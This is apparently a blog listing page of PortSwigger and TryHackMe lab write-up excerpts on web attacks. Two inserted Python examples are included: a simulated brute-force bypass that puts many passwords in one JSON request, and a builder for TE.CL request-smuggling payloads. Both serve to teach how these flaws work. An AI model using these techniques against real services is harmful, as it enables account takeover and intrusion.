J3bitok · jebitok.hashnode.dev · Jan 11, 2025
The Advent of Cyber: Day 14: Certificate mismanagement - Even if we're horribly mismanaged, there'll be no sad faces on SOC-mas! (TryHackMe)
In this article, we'll cover the "Certificate mismanagement - Even if we're mismanaged, there'll be no sad faces on SOC-mas!" write-up, the Day 14 challenge of the Advent of Cyber event. It involved using PortSwigger's Burp Suite to take advant...
Tags: portswigger
J3bitok · jebitok.hashnode.dev · Jan 11, 2025
The Advent of Cyber: Day 5: XXE - SOC-mas XX-what-ee? (TryHackMe)
In this article, we'll cover the "XXE - SOC-mas XX-what-ee?" write-up, the Day 5 challenge of the Advent of Cyber event. It was interesting to navigate Web Security for an e-commerce gifting site using PortSwigger's XML external entity (XXE...
Tags: xxe
Ohekpeje Joel Odey · joelodey.hashnode.dev · Nov 17, 2024
Lab: Broken brute-force protection, multiple credentials per request
Lab Scenario: Our objective is to understand and exploit a web application's broken brute-force protection, where the login credentials are submitted in JSON format. By manipulating the request to submit multiple credentials, we aim to bypass the pro...
Series: PortSwigger Authentication Labs · Tags: websecurity
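The excerpt above describes the lab's technique (one JSON login request carrying many passwords) without showing why it works. The following is an added example, not code from the listed post or from PortSwigger: a constructed stand-in for a login endpoint whose throttle counts requests rather than password attempts, and whose password check silently accepts a JSON array. The account name, secret password, wordlist and lockout threshold are all assumptions made here; a hardened variant that rejects any non-string password is included for contrast.

```python
"""Added example (not from the listed post): why a JSON login that accepts an
array for "password" defeats a per-request brute-force throttle.
All names, the wordlist and the stored password are constructed here."""
import json

# Constructed test data (assumptions, not values from the lab).
TARGET_USER = "carlos"
SECRET_PASSWORD = "letmein"
WORDLIST = ["123456", "password", "qwerty", "letmein", "welcome"]

MAX_FAILED_REQUESTS = 3   # throttle: lock the account after this many failed requests


class LoginService:
    """Minimal stand-in for the lab's login endpoint. The throttle counts
    *requests*; the vulnerable check also accepts a list for "password"."""

    def __init__(self, strict: bool):
        self.strict = strict
        self.failed_requests = 0

    def login(self, body: str) -> str:
        if self.failed_requests >= MAX_FAILED_REQUESTS:
            return "locked"
        data = json.loads(body)
        user = data.get("username")
        pw = data.get("password")

        if self.strict:
            # Hardened: the password must be a single string. Anything else is
            # rejected before comparison and still counts against the throttle.
            if not isinstance(pw, str):
                self.failed_requests += 1
                return "bad_request"
            ok = user == TARGET_USER and pw == SECRET_PASSWORD
        else:
            # Vulnerable: a list is treated as "any of these", so one request
            # tests the whole wordlist while consuming a single throttle slot.
            candidates = pw if isinstance(pw, list) else [pw]
            ok = user == TARGET_USER and any(c == SECRET_PASSWORD for c in candidates)

        if ok:
            self.failed_requests = 0
            return "success"
        self.failed_requests += 1
        return "invalid"


def multi_credential_body(username: str, passwords: list) -> str:
    """Build the single JSON request that carries the whole wordlist."""
    return json.dumps({"username": username, "password": passwords})


def one_at_a_time(service: LoginService, username: str, wordlist) -> list:
    """Naive brute force, one password per request: the throttle bites before
    the correct password is reached."""
    return [service.login(json.dumps({"username": username, "password": p}))
            for p in wordlist]


def attack(strict: bool) -> str:
    """Send the array-valued password to a vulnerable or hardened service."""
    svc = LoginService(strict=strict)
    return svc.login(multi_credential_body(TARGET_USER, WORDLIST))


if __name__ == "__main__":
    print("sequential:", one_at_a_time(LoginService(strict=False), TARGET_USER, WORDLIST))
    print("array body vs vulnerable server:", attack(strict=False))
    print("array body vs hardened server:", attack(strict=True))
```

The fix is the type check, not the throttle: once the server insists that `password` is a string, the array request is rejected and still counted, so the attacker gains nothing over one password per request.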
Ohekpeje Joel Odey · joelodey.hashnode.dev · Nov 8, 2024
Lab: Exploiting XXE to perform SSRF attacks
Lab Scenario: Our mission is to exploit XXE through a web application's "Check stock" feature, ultimately performing SSRF attacks to access sensitive information from a metadata endpoint. By intercepting and manipulating a POST request, we intend to ...
Series: PortSwigger XML external entity (XXE) injection · Tags: xxe
Ashlesh Singh Chouhan · unlockingadminaccess.hashnode.dev · Oct 17, 2024
The Power of SQL Injection: From Product Filters to Admin Access
In this post, we'll explore how to exploit a SQL injection vulnerability in a non-Oracle database. SQL injection is one of the most dangerous security risks and can lead to unauthorized access to sensitive data. By following this lab, you'll learn ho...
Tags: admin access
Aditya Uniyal · adityauniyal.hashnode.dev · Oct 5, 2024
Information Disclosures Lab (Fast recap)
Lab 1: Information disclosure in error messages. It gives information about the version if we put in a wrong input parameter. Lab 2: Information disclosure on debug page. We can just check the source code; there it mentions the path to a php f...
Tags: #cybersecurity
Shubham Sutar · ishubh.hashnode.dev · Sep 23, 2024
Burp Suite cursor displayed offset to the right of text in high DPI
When I try to type in the textbox of PortSwigger Burp (all recent versions, 1.5.20 or latest versions), the cursor shows up at the right place, but things are inserted as if the cursor is somewhere else. It's frustrating to try to edit a payload whe...
Series: Error Solution
Ohekpeje Joel Odey · joelodey.hashnode.dev · Aug 24, 2024
Lab: HTTP request smuggling, basic TE.CL vulnerability
Lab Scenario: Our mission is to explore and exploit a simulated web application's vulnerability to HTTP request smuggling. We'll use the TE.CL technique to manipulate the transfer encoding and content length, revealing potential security weaknesses. ...
Series: PortSwigger HTTP request smuggling Labs · Tags: portswigger
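The excerpt names the TE.CL technique but the listing does not show how the two length headers are arranged. The block below is an added example, not code from the listed post or from PortSwigger: it builds a TE.CL request around a constructed smuggled request, then simulates both ends of the chain. The front-end honours Transfer-Encoding, so it reads the whole chunked body and forwards it; the back-end honours Content-Length, reads only the chunk-size line as the body, and is left holding the smuggled bytes as the start of the next request. The host name and the smuggled request are assumptions made here.

```python
"""Added example (not from the listed post): layout of a TE.CL request and a
simulation of why a Content-Length back-end sees a second, smuggled request.
The host and the smuggled request below are constructed for this example."""

CRLF = "\r\n"

# Constructed smuggled request. Its own Content-Length (15) is larger than
# its body ("x=1"), so the back-end waits for the next request on the
# connection and appends those bytes to it.
SMUGGLED = ("GPOST / HTTP/1.1" + CRLF +
            "Content-Type: application/x-www-form-urlencoded" + CRLF +
            "Content-Length: 15" + CRLF +
            CRLF +
            "x=1")


def build_te_cl(host: str, smuggled: str) -> bytes:
    """Wrap `smuggled` in a single chunk. Content-Length covers exactly the
    chunk-size line plus its CRLF, so a CL-based parser stops right there."""
    chunk_size = format(len(smuggled.encode()), "x")   # hex, no 0x prefix
    content_length = len(chunk_size) + 2
    body = f"{chunk_size}{CRLF}{smuggled}{CRLF}0{CRLF}{CRLF}"
    headers = [
        "POST / HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {content_length}",
        "Transfer-Encoding: chunked",
    ]
    return (CRLF.join(headers) + CRLF + CRLF + body).encode()


def frontend_request_length(raw: bytes) -> int:
    """Simulate a front-end that trusts Transfer-Encoding: chunked. Returns the
    number of bytes it considers part of this request (the whole chunked body,
    through the terminating 0-chunk), which it then forwards unchanged."""
    pos = raw.index(b"\r\n\r\n") + 4
    while True:
        nl = raw.index(b"\r\n", pos)
        size = int(raw[pos:nl], 16)
        pos = nl + 2
        if size == 0:
            return pos + 2          # empty trailer section: one more CRLF
        pos += size + 2             # skip chunk data and its trailing CRLF


def backend_split(raw: bytes):
    """Simulate a back-end that ignores Transfer-Encoding and trusts
    Content-Length. Returns (request_line, body, leftover); `leftover` is
    what the back-end will parse as the beginning of the next request."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    content_length = 0
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            content_length = int(value.strip())
    return lines[0].decode(), rest[:content_length], rest[content_length:]


if __name__ == "__main__":
    req = build_te_cl("vulnerable.example", SMUGGLED)   # assumed host name
    print(req.decode())
    print("front-end forwards", frontend_request_length(req), "of", len(req), "bytes")
    _, body, leftover = backend_split(req)
    print("back-end body:", body, "next request starts with:", leftover[:16])
```

With the constructed smuggled request, the chunk size comes out as `5c` and the outer Content-Length as 4; the simulation shows the front-end forwarding every byte while the back-end's body ends after `5c\r\n`, leaving `GPOST / HTTP/1.1` queued as the next request.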
Dh89 · dh89.hashnode.dev · Aug 16, 2024
Lab*5 - Path Traversal
Lab 5. We continue with the PortSwigger Path Traversal labs, in this case the fifth one. Solution: We see the classic product-sales site that we usually see in the PortSwigger labs. As we read in ...
Tags: Path Traversal, Burpsuite
Dh89 · dh89.hashnode.dev · Aug 14, 2024
Lab*4 - Path Traversal
Lab 4. This is PortSwigger lab 4; we are going to continue the Path Traversal labs. Solution: We see the typical web page, already familiar from the PortSwigger labs, selling certain items. We see in the ...
Tags: Path Traversal, Burpsuite